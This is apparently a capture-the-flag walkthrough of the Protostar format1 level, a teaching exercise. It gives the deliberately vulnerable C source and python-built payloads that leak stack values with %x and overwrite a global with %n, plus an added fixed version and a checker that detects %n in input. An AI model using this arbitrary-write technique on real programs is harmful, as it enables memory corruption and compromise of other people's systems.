A simple Format String exploit example - bin 0x11

format1

This level shows how format strings can be used to modify arbitrary memory locations.

Hints: objdump -t is your friend, and your input string lies far up the stack :) (you can use objdump -t to find all symbols from the binary)

First of all, this is a memory leak (information disclosure) vulnerability: you can leak all kinds of values from the stack. Imagine a program running with ASLR, so the location of the stack in memory is random. You don't know where it is, but you need that address for a buffer overflow to jump to shellcode. With a format string bug you can leak values from the process memory, more specifically from the stack, because each "%x" prints the next word above the format string's own arguments.

$ ./format1 "%x %x %x %x"
804960c bffff6d8 8048469 b7fd8304
$ ./format1 "`python -c 'print("%x "*20)'`"
804960c bffff6a8 8048469 b7fd8304 b7fd7ff4 bffff6a8 8048435 bffff890 b7ff1040 804845b b7fd7ff4 8048450 0 bffff728 b7eadc76 2 bffff754 bffff760 b7fe1848 bffff710 

source code:

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int target;

void vuln(char *string)
{
  /* the bug: argv[1] is used directly as the format string, so "%x" reads
     stack words and "%n" writes through a pointer taken from the stack */
  printf(string);

  if(target) {
      printf("you have modified the target :)\n");
  }
}

int main(int argc, char **argv)
{
  vuln(argv[1]);
  return 0;
}

get the address of target:

$ objdump -t ./format1 | grep target
08049638 g     O .bss	00000004              target
$ ./format1 "`python -c 'print("AAAA" + "\x38\x96\x04\x08" + "BBBBBBBBB" + "%x "*137)'`"
AAAA8BBBBBBBBB804960c bffff538 8048469 b7fd8304 b7fd7ff4 bffff538 8048435 bffff720 b7ff1040 804845b b7fd7ff4 8048450 0 bffff5b8 b7eadc76 2 bffff5e4 bffff5f0 b7fe1848 bffff5a0 ffffffff b7ffeff4 804824d 1 bffff5a0 b7ff0626 b7fffab0 b7fe1b28 b7fd7ff4 0 0 bffff5b8 94293f61 be7bc971 0 0 0 2 8048340 0 b7ff6210 b7eadb9b b7ffeff4 2 8048340 0 8048361 804841c 2 bffff5e4 8048450 8048440 b7ff1040 bffff5dc b7fff8f8 2 bffff716 bffff720 0 bffff8cd bffff8e2 bffff8f9 bffff911 bffff91f bffff933 bffff957 bffff96e bffff981 bffff98b bffffe7b bffffe94 bffffed2 bffffee6 bfffff04 bfffff1b bfffff2c bfffff47 bfffff4f bfffff5f bfffff6c bfffffa4 bfffffb8 bfffffcc bfffffd8 0 20 b7fe2414 21 b7fe2000 10 f8bfbff 6 1000 11 64 3 8048034 4 20 5 7 7 b7fe3000 8 0 9 8048340 b 3e9 c 0 d 3e9 e 3e9 17 1 19 bffff6fb 1f bffffff2 f bffff70b 0 0 b1000000 dffb6907 530f35e1 b99af379 699d7479 363836 0 2f2e0000 6d726f66 317461 41414141 8049638 
$ ./format1 "`python -c 'print("AAAA" + "\x38\x96\x04\x08" + "BBBBBBBBB" + "%x "*136 + "%n ")'`"
AAAA8BBBBBBBBB804960c bffff538 8048469 b7fd8304 b7fd7ff4 bffff538 8048435 bffff720 b7ff1040 804845b b7fd7ff4 8048450 0 bffff5b8 b7eadc76 2 bffff5e4 bffff5f0 b7fe1848 bffff5a0 ffffffff b7ffeff4 804824d 1 bffff5a0 b7ff0626 b7fffab0 b7fe1b28 b7fd7ff4 0 0 bffff5b8 eb6e6312 c13c9502 0 0 0 2 8048340 0 b7ff6210 b7eadb9b b7ffeff4 2 8048340 0 8048361 804841c 2 bffff5e4 8048450 8048440 b7ff1040 bffff5dc b7fff8f8 2 bffff716 bffff720 0 bffff8cd bffff8e2 bffff8f9 bffff911 bffff91f bffff933 bffff957 bffff96e bffff981 bffff98b bffffe7b bffffe94 bffffed2 bffffee6 bfffff04 bfffff1b bfffff2c bfffff47 bfffff4f bfffff5f bfffff6c bfffffa4 bfffffb8 bfffffcc bfffffd8 0 20 b7fe2414 21 b7fe2000 10 f8bfbff 6 1000 11 64 3 8048034 4 20 5 7 7 b7fe3000 8 0 9 8048340 b 3e9 c 0 d 3e9 e 3e9 17 1 19 bffff6fb 1f bffffff2 f bffff70b 0 0 b000000 71214f20 85368a42 13ebb60d 6998cac7 363836 0 2f2e0000 6d726f66 317461 41414141  you have modified the target :)

and pwned...
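As an added example (not part of the original post or the protostar source), here is the fixed form of vuln() next to a small checker that flags format directives arriving in data which should never act as a format string; scan_directives, count_directives, has_write_directive and run_fixed are names chosen here, and the default input is a constructed sample. Compiling the original with gcc -Wformat -Wformat-security already warns on the printf(string) call.

```c
#include <stdio.h>
#include <string.h>
#include <stdbool.h>

int target;                     /* same global the level checks after printf */

/* The fix for the level's vuln(): a constant format string, so the input is
 * only ever consumed as a %s argument and its own '%' characters mean nothing.
 * (gcc -Wformat -Wformat-security flags the original printf(string) call.) */
void vuln_fixed(const char *string) { printf("%s", string); }

/* Scan s for printf conversions (a '%' not followed by another '%').
 * Returns how many there are and, via has_n, whether one of them is %n,
 * the directive that turns a read-only leak into a memory write. */
static int scan_directives(const char *s, bool *has_n)
{
    int count = 0;
    if (has_n) *has_n = false;
    for (const char *p = s; *p; p++) {
        if (*p != '%') continue;
        if (p[1] == '%') { p++; continue; }      /* "%%" prints a literal '%' */
        count++;
        const char *q = p + 1;                   /* skip flags, width, precision, length */
        while (*q && strchr("0123456789$#-+ .'hlLqjzt", *q)) q++;
        if (*q == 'n' && has_n) *has_n = true;
        if (*q) p = q;                           /* resume after the conversion char */
    }
    return count;
}

int count_directives(const char *s) { return scan_directives(s, NULL); }

bool has_write_directive(const char *s) { bool n; scan_directives(s, &n); return n; }

/* Run the fixed function on input and return target, which must stay 0. */
int run_fixed(const char *input) { target = 0; vuln_fixed(input); putchar('\n'); return target; }

int main(int argc, char **argv)
{
    const char *input = argc > 1 ? argv[1] : "AAAA%x %x %x %n";  /* constructed sample */
    fprintf(stderr, "%d directive(s), %%n present: %s\n",
            count_directives(input), has_write_directive(input) ? "yes" : "no");
    return run_fixed(input) != 0;
}
```

Run it with the same "%x %x %x %x" argument as the level: the fixed function echoes the text verbatim and target stays 0, while the checker reports four directives and no %n.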
